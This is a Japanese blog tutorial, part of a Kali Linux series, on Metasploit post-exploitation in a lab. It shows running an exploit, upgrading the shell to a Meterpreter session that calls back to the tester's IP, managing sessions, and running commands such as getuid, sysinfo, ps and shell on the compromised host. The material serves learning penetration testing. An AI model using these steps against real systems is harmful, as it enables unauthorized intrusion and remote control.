Kali Linux_Metasploit4

「Metasploit3」の続きになります。
ペネトレを実行する際の基本手順としては、下記のとおりになります。
ここでは、「6.exploit:実行」について記載します。

1.nmap:対象の脆弱性を探します。

2.search:対象の脆弱性に合うmetasploitのモジュールを検索します。

3.use 【モジュール】:使用するモジュールを選択します。

4.options:使用するモジュールのパラメータを確認します。

5.set RHOST:対象のIPアドレスなどを設定します。

6.exploit :実行します。

1.exploit:実行

2.操作

コマンド「ifconfig」を入力すると、相手側の情報が表示されます。

コマンド「whoami」やコマンド「dir」なども表示されます。

3.exploit:別の実行(meterpreter)

シェルからMeterpreterプロンプトに切り替えます。
それにはpost/multi/manage/shell_to_meterpreterモジュールを使用します。

まず、上記の侵入後、下図のとおり「Ctr」+「zキー」を入力してセッションをバックグランドにしておきます。ここでは現在の接続を「1」としますかと出るので「y」を入力します。

msf> use post/multi/manage/shell_to_meterpreter
msf> set LHOST 自身のIPアドレス(ここでは192.168.46.10)

実行後、新しいセッションが1つ確立され、Meterpreterが使用可能となります。
(今回はセッション3に新しくできました)

現在のセッションを確認します。2個のセッションが確認できますが、「meterpreter」はセッション3になります。

msf> sessions

セッション3に接続します。無事「meterpreter」を使用することができます。

msf> sessions -i セッションの数字

セッションを維持したまま、「meterpreter」コンソールを終了する場合は、「background」を入力するか、または「Ctr」+「zキー」を入力します。

meterpreter> background


セッションを切る場合は、-k となります。

msf> sessions -k セッションの数字

4.meterpreter

「meterpreter」では、色んなコマンドが使用可能となります。

コマンド内容
getuid侵入先の実行権限を表示
getpid侵入先のPIDを表示(meterpreter)
sysinfo侵入先のシステム情報を表示
ps親友先のプロセス一覧を表示

shellコマンドを実行することで、対象先の立場となってコマンド(シェル)が実行できます。

meterpreter> shell

日本語などがあると、文字化けすることがあるので、下記のコマンドを入力してコードページを変更してください。

chcp 437

戻る際には「exit」を実行すれば「meterpreter」に戻ります。

他にも「meterpreter」には様々な機能がありますが、対象先が「Windows」の方が、それらの機能を有効的に使用できそうです。

サイバー
スポンサーリンク
takeをフォローする
スポンサーリンク
サイバー・セキュリティ・フォレンジック 備忘録
タイトルとURLをコピーしました